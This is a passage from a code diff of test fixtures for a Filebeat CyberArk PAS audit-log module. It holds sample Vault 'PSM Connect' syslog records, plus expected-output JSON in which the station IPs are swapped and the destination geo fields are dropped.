Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json
index ccb0ea7ec482..562092b46757 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json 
@@ -91,18 +91,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:20Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:38:20", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", @@ -134,7 +129,7 @@ "related.ip": [ "127.0.0.1", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -171,18 +166,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:56Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:46:56", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", 
@@ -203,7 +193,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5086, + "log.offset": 5084, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "outbound", @@ -214,7 +204,7 @@ "related.ip": [ "127.0.0.1", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -251,18 +241,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:34Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:48:34", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", 
@@ -283,7 +268,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 7606, + "log.offset": 7602, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "outbound", @@ -294,7 +279,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -331,18 +316,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:54:56Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:54:56", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", 
@@ -363,7 +343,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 10124, + "log.offset": 10118, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "outbound", @@ -374,7 +354,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -411,18 +391,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:37Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:56:37", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", 
@@ -443,7 +418,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 12642, + "log.offset": 12634, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "outbound", @@ -454,7 +429,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -491,18 +466,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:25Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 12:23:25", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", 
@@ -523,7 +493,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 15160, + "log.offset": 15150, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "outbound", @@ -534,7 +504,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", 
@@ -572,23 +542,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:37Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n 